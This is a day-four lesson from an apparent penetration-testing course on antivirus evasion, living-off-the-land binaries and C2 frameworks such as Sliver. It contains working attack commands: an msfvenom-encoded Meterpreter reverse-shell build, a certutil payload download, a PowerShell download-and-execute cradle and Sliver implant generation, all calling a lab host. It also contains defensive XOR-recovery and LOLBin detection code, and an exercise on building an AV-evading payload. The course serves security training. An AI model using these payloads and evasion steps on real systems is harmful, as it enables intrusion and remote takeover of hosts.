Day 4 of 5
⏱ ~60 minutes
Penetration Testing in 5 Days — Day 4

Advanced Tools & Evasion

Modern environments deploy EDR, AV, and network monitoring that detect common attack tools. Today you learn tool customization, payload obfuscation, and living-off-the-land techniques to operate in defended environments.

Antivirus Evasion Techniques

Signature-based AV matches known byte patterns in files, so the classic bypasses all change what lands on disk: encoding or encrypting the payload (XOR; base64 is mainly a transport encoding and hides nothing from a scanner), executing it in memory only (fileless), obfuscating source code, and launching it through legitimate system binaries (LOLBins). Veil-Framework, Shellter, and custom Python or C# loaders generate payloads this way. Two caveats a practitioner needs: the stock msfvenom encoders and their decoder stubs are themselves signatured, so encoding alone rarely evades a current engine, and modern AV/EDR adds behavioural and in-memory checks (AMSI for PowerShell and other script hosts), so a memory-only payload can still be caught at the moment it runs. Always test against several engines.
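The following is an added example (not code from this course, and not msfvenom's x64/xor_dynamic encoder): the repeating-key XOR that simple payload encoders apply, iterated the way an `-i N` option does, followed by the known-plaintext key recovery that a sandbox or analyst performs in a fraction of a second. It shows why encoding is not evasion: the effective key is recoverable from a few predictable leading bytes, and extra rounds collapse to a single round. The payload bytes and the ten round keys are constructed dummies.

```python
"""
Repeating-key XOR encoding of a payload blob, iterated the way an encoder's
-i N option does, followed by the known-plaintext key recovery that shows
why encoding is not evasion. Added example for this lesson: it is not
msfvenom's x64/xor_dynamic encoder, and the payload and keys are constructed.
"""
from functools import reduce


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same call decodes, because x ^ k ^ k == x."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_rounds(data: bytes, keys: list) -> bytes:
    """Apply one XOR round per key, as an encoder run with -i len(keys) would."""
    for k in keys:
        data = xor_encode(data, k)
    return data


def combined_key(keys: list) -> bytes:
    """Rounds with equal-length keys collapse to one round with the XOR of the
    keys, so iterations add no strength against analysis."""
    if any(len(k) != len(keys[0]) for k in keys):
        raise ValueError("this collapse assumes equal key lengths")
    return reduce(xor_encode, keys)


def recover_key(encoded: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Known-plaintext attack: with key_len bytes of plaintext known (a NOP sled,
    an 'MZ' header, a decoder stub's first instructions), key = cipher ^ plain."""
    if len(known_prefix) < key_len or len(encoded) < key_len:
        raise ValueError("need at least key_len bytes of ciphertext and plaintext")
    return bytes(encoded[i] ^ known_prefix[i] for i in range(key_len))


# Constructed dummy payload: a NOP sled followed by marker bytes (not shellcode).
DUMMY_PAYLOAD = b"\x90" * 16 + b"DUMMY-PAYLOAD-BYTES"

# Ten fixed 4-byte round keys (constructed; a real encoder would draw them at random).
ROUND_KEYS = [
    b"\x13\x37\xaa\x55", b"\x01\x02\x03\x04", b"\xff\x00\xff\x00", b"\xde\xad\xbe\xef",
    b"\x0f\x0f\xf0\xf0", b"\x42\x42\x42\x42", b"\x99\x88\x77\x66", b"\xa5\x5a\xa5\x5a",
    b"\x10\x20\x30\x40", b"\xc0\xff\xee\x11",
]


def demo() -> dict:
    """Encode with 10 rounds, then recover the effective key from the known NOP
    sled prefix and decode without ever seeing the round keys."""
    encoded = xor_rounds(DUMMY_PAYLOAD, ROUND_KEYS)
    effective = combined_key(ROUND_KEYS)
    # Defender side: only the ciphertext and a guess at its first bytes are needed.
    recovered = recover_key(encoded, b"\x90" * 4, key_len=4)
    decoded = xor_encode(encoded, recovered)
    return {
        "encoded": encoded,
        "effective_key": effective,
        "recovered_key": recovered,
        "decoded": decoded,
        "collapses": xor_encode(DUMMY_PAYLOAD, effective) == encoded,
    }


if __name__ == "__main__":
    r = demo()
    print("effective key:", r["effective_key"].hex(), "recovered:", r["recovered_key"].hex())
    print("decoded == original:", r["decoded"] == DUMMY_PAYLOAD)
```

The point for an operator is the last two lines of `demo()`: whoever holds the sample holds the key, so what decides detection is the decoder stub and the runtime behaviour, not the number of XOR rounds.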

Living Off the Land (LOLBins)

LOLBins are legitimate Windows and Linux binaries an attacker can repurpose: certutil.exe downloads files (-urlcache -f) and decodes base64, mshta.exe runs HTA files and javascript:/vbscript: URLs, regsvr32.exe loads a remote COM scriptlet through scrobj.dll (the /i:http://... scrobj.dll trick), and rundll32.exe calls any exported function from any DLL. The LOLBAS project (Windows) and GTFOBins (Linux) catalog known techniques. Because the binaries are signed and expected on every host, defenders detect the abuse rather than the binary: the parent process (an Office application spawning mshta.exe), the command-line arguments (certutil with -urlcache and an http URL), and network connections from processes that normally make none. Current EDR products ship such rules, so these techniques mostly succeed against legacy or poorly tuned defences.

C2 Frameworks: Cobalt Strike and Alternatives

Command and Control (C2) frameworks manage post-exploitation sessions across many compromised hosts from one server. Cobalt Strike is the commercial standard for red teams; open-source alternatives include Sliver, Havoc, and Covenant. They add what a plain Meterpreter session lacks: flexible listener types and traffic shaping (malleable C2 profiles in Cobalt Strike; mTLS, WireGuard, HTTP(S) and DNS transports in Sliver), peer-to-peer pivoting between implants, and multi-operator collaboration. The default artifacts of every popular framework are heavily signatured, so an unmodified implant is detected on sight; the customization covered earlier in this lesson is what makes them usable.

```bash
# Encode a Meterpreter payload with msfvenom (10 rounds of the x64/xor_dynamic encoder).
# Stock encoders and their decoder stubs are well known to AV; treat this as a baseline, not evasion.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=443 \
  -e x64/xor_dynamic -i 10 \
  -f exe -o payload_encoded.exe

# Test the detection rate on a no-distribute scanner such as antiscan.me (it does not share samples with vendors).
# Windows LOLBin: fetch the payload with certutil (run on the target from cmd.exe)
# certutil.exe -urlcache -f http://192.168.1.50/payload.exe payload.exe
```

```powershell
# Build a -EncodedCommand argument: PowerShell expects the script as UTF-16LE text, base64-encoded
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.50/shell.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
```

```bash
# Sliver C2: start the server console, then generate an mTLS implant for Windows x64
sliver-server
sliver> generate --mtls 192.168.1.50 --os windows --arch amd64 --save implant.exe
# Start the matching listener in the sliver console (the `mtls` command, default port 8888)
# before running the implant, or it will have nothing to call back to.
```
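A detection-side counterpart to the LOLBin section and the encoded-PowerShell snippet above, added here as an example (it is not part of the course and not any vendor's rule set): the checks a defender runs over process-creation telemetry, applied to constructed records in a simplified Sysmon Event ID 1 shape (parent, image, command line). The rule names, regexes and sample events are the example's own; a real deployment tunes them against its own baseline, and the benign certutil record at the end shows why matching on the binary alone would be noise.

```python
"""
Process-creation detection for the LOLBin and encoded-PowerShell tradecraft
in this lesson. Added example: the events below are constructed in the shape
of Sysmon Event ID 1 (parent, image, command line); the rule names and
patterns are the example's own, not a product's rule set.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image name
    image: str     # full path of the started process
    cmdline: str   # command line as logged


# The same encoding the lesson's PowerShell snippet performs (UTF-16LE, then base64).
ENCODED_CRADLE = base64.b64encode(
    'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.50/shell.ps1")'
    .encode("utf-16-le")
).decode("ascii")

# Constructed sample telemetry; the last record is benign certutil usage.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -f http://192.168.1.50/payload.exe payload.exe"),
    ProcEvent("winword.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://192.168.1.50/run.hta"),
    ProcEvent("cmd.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://192.168.1.50/x.sct scrobj.dll"),
    ProcEvent("cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -EncodedCommand " + ENCODED_CRADLE),
    ProcEvent("services.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -verify cert.cer"),
]

# (rule name, binary, command-line pattern): flag the abuse, not the binary.
LOLBIN_RULES = [
    ("certutil-remote-download", "certutil.exe", r"(?i)-urlcache\b.*https?://|-(?:en|de)code\b"),
    ("mshta-remote-script", "mshta.exe", r"(?i)https?://|(?:java|vb)script:"),
    ("regsvr32-remote-scriptlet", "regsvr32.exe", r"(?i)/i:https?://|scrobj\.dll"),
    ("rundll32-script-execution", "rundll32.exe", r"(?i)javascript:|url\.dll,"),
]

# -EncodedCommand and the short forms PowerShell accepts, followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = re.compile(r"(?i)\bIEX\b|Invoke-Expression|DownloadString|WebClient|FromBase64String")

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list = nothing seen)."""
    hits = []
    name = ev.image.rsplit("\\", 1)[-1].lower()
    for rule, binary, pattern in LOLBIN_RULES:
        if name == binary and re.search(pattern, ev.cmdline):
            hits.append(rule)
    if name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            hits.append("powershell-encoded-command")
            if SUSPICIOUS_PS.search(decoded):
                hits.append("powershell-download-cradle")
    if ev.parent.lower() in OFFICE_PARENTS and name in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that tripped at least one rule."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"[{i}] {SAMPLE_EVENTS[i].cmdline[:60]}... -> {hits}")
```

Note that the encoded-command check decodes the argument rather than matching on the base64 text: the same cradle produces a different blob every time the URL or whitespace changes, but the decoded script still contains the download primitive. This is also the reason the `-EncodedCommand` trick in this lesson buys nothing against a logging pipeline that does the same decoding.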
💡
Never upload test payloads to VirusTotal: it distributes samples to AV vendors, which burns the technique and, because the implant embeds your LHOST or C2 address, your infrastructure as well. Use a no-distribute scanner such as antiscan.me, or an offline lab with the target AV installed.
📝 Day 4 Exercise
Build an AV-Evading Payload
  1. Generate a standard Meterpreter payload and check its AV detection rate on antiscan.me
  2. Apply XOR encoding with 10 iterations and re-test detection rate
  3. Use Shellter to inject a payload into a legitimate PE binary and test again
  4. Set up a Sliver C2 server and generate an mTLS implant
  5. Compare detection rates across all three payload variants

Day 4 Summary

  • AV evasion uses encoding, obfuscation, and memory-only execution
  • LOLBins abuse legitimate system binaries to blend with normal activity
  • C2 frameworks manage multiple compromised hosts from a central server
  • Sliver and Havoc are open-source Cobalt Strike alternatives
  • Test evasion on antiscan.me, never VirusTotal
Challenge

Research and document 5 LOLBins techniques (3 Windows, 2 Linux). For each one, describe the binary, the abuse technique, and the defensive detection method defenders use.
